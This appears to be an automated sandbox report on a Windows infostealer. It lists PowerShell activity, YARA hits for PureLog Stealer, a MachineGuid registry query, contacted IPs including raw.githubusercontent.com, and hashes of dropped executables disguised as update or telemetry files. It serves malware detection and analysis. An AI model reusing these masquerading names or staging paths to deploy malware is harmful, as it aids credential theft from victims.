Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation

Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match	File source: 00000037.00000002.1817217674.0000000004B32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000037.00000002.1926718399.0000000006FF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000037.00000002.1879276919.0000000005EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000037.00000002.1879276919.0000000006141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000076.00000002.2720062621.00000000060A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000078.00000002.2493789201.000001B2394C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 00000037.00000002.1817217674.0000000004B32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000037.00000002.1926718399.0000000006FF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000037.00000002.1879276919.0000000005EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000037.00000002.1879276919.0000000006141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000076.00000002.2720062621.00000000060A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000078.00000002.2493789201.000001B2394C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Domain

Country

Flag

ASN

ASN Name

Malicious

72.21.81.240

unknown

United States

15133

EDGECASTUS

false

23.41.168.93

unknown

United States

6461

ZAYO-6461US

false

185.199.110.133

raw.githubusercontent.com

Netherlands

54113

FASTLYUS

false

127.0.0.1

Name

Active

raw.githubusercontent.com

185.199.110.133

true

Name	Type	MD5	SHA1	SHA256
C:\Config.Msi\40c08b.rbs	data	2DC0C71715C250A0BE56F047D61967A2	C8D58B602B2697AF245C0E2841E3E3D58597D9E4	D0AEA8AC498C967A4F68E70A11604DD93DFD4DBABFB8804F1705CC256EB29BE1
C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_sc09.wav	RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz	F759D9F3F35DDA05908011FCAED1D018	0A7852907851700F7424094B7658D78743559DAE	1780F4481AAE5BC51FB79A42D92946ADE0C5459EFD99DAA67BF2D1DCAE275919
C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_samplernn.wav	RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz	5ACAB132E4BAF883D7F785FABF624952	DCD1E3FE209CEA31E72531E1484B6BB156347308	E14563629A67F07764F12CFAE343D8DDB0309CBDA241391D095FBB6109302DD1
C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavegan_pp.wav	RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz	1F17C039E805F0366322565C65C44A96	58F9A9787E412E22BDFDF80EE989CD0CA76B7EC6	618F46233CB90B39D0DA37F37033C0F181ECE8583F814CE41C11D1A4D5C49666
C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavegan_ps2.wav	RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz	0F9223E9FDB356D794EBEF388A0BF432	4CEEDE02E49E2FAE1A3851B3FF58DE226B2CA970	E99D3F16C079D80C3F8EE5F897828A0D2934A6C7C0170D17AD6DB3A0CE9C52D1
C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavegan_ps4.wav	RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz	CF7E23B55069463BB897E1D80257B0C2	39E1E3BE1495678B60A14DAC1247B5411FA4B2CC	C9B064614012BBE92168A41C47493B35194840A8BCDF5B7238EDCF26EB075900
C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavenet_ibab.wav	RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz	14857C23DCC708DAD22E36F138EAD789	A9DCB7F0661B046FBA30C3312CAFE96F5F8D76DD	1823AA8025A0BD7B909A3BB1B514BE13E17DC049F448C016925EC1F3E64BF7EC
C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_drums.wav	RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz	149CD5CC6A68E10130DB2C4A03D71DE0	4BE908D4048EEBB86E3B5C95964C4BC156282DDA	6A30422FCE563F3A084020EB86A3A728C3CF1EB04506E081E0FA7BBCA9B54EE1
C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_sc09.wav	RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz	5392A5FB1C3D0CE48EE2F6DB8C8C157C	694AD4D5939FA7D468399150A026A3EFCE6773BF	1033B1227E5A7814B34221274272B384F0F8DDBE31A600FF070EF1F0C1FEE901
C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_tatum.wav	RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz	F764169BFFE65099EDA80ACE5F90E046	82BCAEC9920FFABC3C6EA08A277511C2E871B230	88341A5EE3600529B8026D421D2B6004299D9BC3D89BDB3E2A8643CCA107F3ED
C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_birds.wav	RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz	189AE0C626D6D7287E0FFED4389CCB05	EC64C9F7B9FA6D6879793317E8431AC69338DDB8	F43A43E58ECD71A43A1393A6C6A3056228E525963704ED75AE04BD5FBCD2305F
C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_drums.wav	RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz	6EB8849162425BF473A9A86F8765E014	4D439D545B09D5711A3E85C68FF43C6C39934A85	33C47E6D4A82A09134205811A63ED78A1DE4AF1F61FB04C921785AD91E3ECAEF
C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_piano.wav	RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz	EE5FB4B49FE3D85F8A18D622D155C1B7	3CB420A5B81952E8B02C71402F79FB2D14AE696A	C4017D513A85A3DBDE5EA42EE0C500E19A392147793C30E51F4B8E4AF0AFD751
C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_piano.wav	RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz	84CB9D76404E7060326ED19DC51A9A1F	5945326BBC8B4E48AFBEA13F8C2CF564FFBAFBEE	C6CA1F7B252C74AE234C25F37B8EB0122945BE66701BF22486C3C27DE8D9908B
C:\Program Files (x86)\OpenSource\CheatInstaller\db.frm	MySQL table definition file Version 9, type MYISAM, MySQL version 50568	AC330F2A89A6C828059D1F125CB9CB60	A40B10EAE1FBA1EA43FF70B3941A165D6D0502F2	9B2123A554181148E29BBEB66F18DA5619B1FD796E4F3DE49415748822FEF4EC
C:\Program Files (x86)\OpenSource\CheatInstaller\event.csv	MySQL table definition file Version 9, type MYISAM, MySQL version 50568	2620F56F03159589486B831D9B6ADC4A	55DFC135BE75692BD64C50B429DCD5460E0B0B90	8438F31C41C8214D92EF0227B0E45EAE937E6E5221E410AF1AD3735DC9E2EE71
C:\Program Files (x86)\OpenSource\CheatInstaller\general_log.frm	MySQL table definition file Version 10, type FEDERATED_DB, MySQL version 50568	EA26BB989E3E2C321A47D499D2682AE1	A79E8C99186C20FB09F1457B3D183538E1E1B1BB	4A208C39AC55C440FA336C3463428609DB81112512F6551A1331A516A2D1DA81
C:\Program Files (x86)\OpenSource\CheatInstaller\help_topic.frm	MySQL table definition file Version 9, type MYISAM, MySQL version 50568	CCACA741F4002CB8AF48D485501EC8E9	4895716A9BAF869A5BA2EC1C2D0523B7BC8A6CB3	0E2099AA021C0A2819F8F80960D729E66F69754675BFE847AF8923029A330EC1
C:\Program Files (x86)\OpenSource\CheatInstaller\lang_ita.txt	CSV text	89E2A161DF2EF245781707FF93E978BC	AB2189D5C8DCA09CADE0586B929F0264C327DB32	B8F747BABF732BB64A9CFC60A09B79001C87EB3B37D9704174C0964A49ED6F4A
C:\Program Files (x86)\OpenSource\CheatInstaller\slow_log.frm	MySQL table definition file Version 10, type FEDERATED_DB, MySQL version 50568	5CF177C70E9BE2F41ADC86EA7E0FC48B	9A597F4D25A0FB4837FA06B9B3792DE65FAE9551	9276BFD579B31E71A0F85E8B1085E6F00AAFC1428B3C5DEE2E765E80C34260A3
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression	29F65BA8E88C063813CC50A4EA544E93	05A7040D5C127E68C25D81CC51271FFB8BEF3568	1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	data	9720D87A94A2E22C478E9F583243FFAE	0DF5C196A51FA2675D6A3D8DB95C18CBD9732F08	F36CB2C6998767D685B310B5832377CA7DF7C15693BCA767FFE6015CDE8F1AA8
C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows	2F2B25EF8E4A739A8D4F34031620E705	EC07A80EDBEAE1D771B892723C070E4A9A0A7194	6BF4D37DCADD6DA1652048666C0FA737398BE93EBDE1867227F3885939BF538E
C:\Users\user\AppData\Local\Microsoft\Vault\er5thygfd.zip.part	Zip archive data, at least v2.0 to extract, compression method=deflate	992517A15E11AAFFC27900D8A6C64A66	A5C08DF2295DB41C07C8CBB8F33969B024B2BB3A	C2915AE4F3A57631BE92E88D277A12C4756199EEE368DA9D4378725376D64CE5
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	87D53DF6BE096E1002ACC481E0660C5E	D97342A003D5F93A4573017024F1C52DC5375333	D9F7962764CEE12494148547F3154C85B66814727A269BA35AEBF95B1680C555
C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	4E1C6F4BDF64FFFA6BD810AD68B717EC	FAB9FDDEB07AAC4210E2CCAF516FDB6D8368091F	B47509602800BA7DAA361C8FFD80CAFED8E45F0CDE20E7B88742946E68649123
C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Uemlxaw.zip.part	Zip archive data, at least v2.0 to extract, compression method=deflate	72E0C65ABC179659ACFA06D297658647	6E352742768A3314E1379389C2C3D4F5D504E4AD	47A2103A84C2EB2949FFAB3A091CC31C385657DB8BEE806444354E015F831D3A
C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\networkbroker.exe	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows	483ECE127784BC1780DF0A3BDF243EF7	E72E08B55A1731DC2D3CF8EB1C421852D6754A49	58AD59910C3450E6461B57C3773E5D004F6CDD272E57F117EB64FDBCF68794C5
C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	2C7CF1309E31C60D8BB7D71D1415C12A	F4D9C96B5D0D6E7667000783B5EF5CC1FC693F50	1183F06624C56051D44F450ADBC0A573803E9A54F2B42815C815B9FE9E0E0D40
C:\Users\user\AppData\Local\Temp\5C5C.tmp\5C5D.tmp\5C5E.bat	ASCII text, with CRLF line terminators	AD8B6610172FF7B78C52F9CA37F38087	9E672AA0385998B41DE0EAEE280AF9372F3B299C	582E18CB3C8B2C06080CBB7DF73EF27128654A4F201476F457A787CAE6B068A4
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\.licensee.json	JSON data	AF5C80ED6BCCEA47E619D5EE19EFF446	FFBFFE96D99CD2227C376475AE26E9A269046CE3	58F759505A8769B7A753530D5C2C9A52735BCBEBF76AAA14F006102D78BFAE20
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\.mailmap	Unicode text, UTF-8 text	AEC7607B554118FE5AD19FA8C2F7F314	0EC69C3E18A0965FE2C484F44EF35E9AE1F7399F	560A8E97D64EBC2556FEAC2DEB24A96BEF722D86E3510768430D4F3D66BFF6CA
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\History.txt	ASCII text, with CRLF line terminators	69A9ED93F118B332335D30F96C66F359	D125AD2574A90CFE50DE95D36F84014D1D0012EE	83495C16B428D317EC3D27912C852F1AF4B84526F6540E579ED34EBB66364D70
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\License.txt	ASCII text, with CRLF line terminators	F4995E1BC415B0D91044673CD10A0379	F2EEC05948E9CF7D1B00515A69C6F63BF69E9CCA	F037E7689F86A12A3F5F836DC73004547C089E4A2017687E5E0B803A19E3888B
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\mock-globals\package.json	JSON data	2F92528DCBE63FD03694135CE9BB7E50	8DB63C9B7312DD277C9021DAC5B938F384B0BBC2	AAFC83D1C5BBF80EC891D2BA487B420A99A0CB46FEEA50091AFDD289F6FCED2A
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\mock-registry\.eslintrc.js	ASCII text	1F007186BE8B5260FF53B341AF5655FD	1858997A42CEA3D5F66C92CD4E2C709A1F96EB4B	191B99C3205D8862BD3A11AF48CFE1DD884203817D109E5CA0817A743CC3D6A1
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\mock-registry\.eslintrc.local.json	JSON data	E6A8F08380C7491FD758DDEB427B4FAC	80DFD629A08827936D4F76C85431248EA5E7C657	820A2A6AC56E7D7D6F860C78B3EE4D7951EA340039695F6BEF50B33A5C93E522
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\mock-registry\.gitignore	ASCII text	8DA13F306C8C0F4F4A32960E93725B42	B9EE3F4A8B64284A8F698206993E4EC2CF83F66F	CA7A3D5544BEB40BEB598F6AE22527E8CBCBC29B67F241AD9E572A50A89848B0
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\mock-registry\lib\index.js	C++ source, ASCII text	4A748B4C103FC82268D3FAAF4A4B26F8	A307F8A37EEA9FF272BC79100EC87EBDD2546202	829D73E78B61C44121B3470EB5355C8F1C88D932EEA0B9108BF9DEA9389FAABF
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\mock-registry\package.json	JSON data	F66E40E2056B291BB482C9CA2D889D8D	03DBB985DF305C3925967E28F310E4697FD6D9DF	69C7444CC910CB9B46FE2E6516C7FD145EFE95211DCABA8AD58D964BAFA5C993
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\mock-registry\test\index.js	ASCII text	61527DCDDB9C0FDD302A7060A0E9FB3C	03A8D5AD38EB0A50295C20A119E5DF88BD2AEFFF	7C6C7369C51AFEA2FA5246C8521B35788F8994F9A43B786BFF6E28D1C70E1C2F
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\.gitignore	ASCII text	BB6D4E8378742BC653706C01C59256D9	0D70B4BC32BE5A05ABB6ABA87BDC2BD0C2B0E1FF	C6189C8740542CD5B8164650DC6CB9BBE28914DC3F6B8BB5ACC52C22C5EAB92B
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@colors\colors\LICENSE	ASCII text	12D99BE4215EA44DF59CE831ED79D258	0C75BF219569BCB432376A47AA7CA56E59708FB9	58597DED729A5E749CC323E2AE6E533A31BE3622737B33E0239BA075CA14B515
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@colors\colors\examples\normal-usage.js	ASCII text	EECE3971254C2DDCBA55C1259AE999CE	BB023A5AA0FF537DEE2413203EE181C14F9C927F	8EBC54E2C345BF1A6084F51AAD90035E4E066F9C46FDCC757FD84430602F3FA1
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@colors\colors\examples\safe-string.js	ASCII text	81EE149DBB058D34E35FE38DDEF46CC5	0164395722C7C3A733AFEB97B21F804B0799D151	1B991D66781ACF3AE02A7CD9EF7E4CD13270A0CDA1A57146BC2DAE2216036C01
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@colors\colors\lib\colors.js	ASCII text	AEAE8A09F5FB6A0E6F58CDB9FBF6CFA3	A7A5B0CEADB0E3CAC9B4723D6158B3EE9605437D	E0AA28D1CFE746E50B36EADD8B73F7077DF3003E07C4F7B3CC5C40E45C597031
